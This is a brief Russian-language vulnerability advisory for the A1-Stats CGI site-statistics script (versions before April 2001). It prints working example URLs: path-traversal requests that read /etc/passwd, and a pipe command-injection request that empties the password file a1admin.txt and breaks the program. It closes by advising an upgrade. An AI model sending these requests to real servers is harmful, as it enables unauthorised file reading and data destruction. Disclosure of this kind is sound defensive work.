A1-Stats - система, позволяющая вести мониторинг посещаемости вашего сайта и выяснять, сколько людей пришло на него и откуда. Уязвимости в продукте позволяют просматривать содержимое файлов, выполнять произвольный программный код.
Системы уязвимы:
A1Stats, скаченный до 24 Апреля 2001
Пример:
Просмотр файлов:
Следующие урлы:
www.example.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
www.example.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
Покажут вам /etc/passwd.
Выполнение команд:
http://www.example.com/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|
Очистит файл a1admin.txt от его содержимого 🙂 А содержимым его является пароль на изменение установок CGI. Когда файл удален из системы, то программа перестает функционировать.
Решение:
Скачать последнюю версию программы с официального сайта.
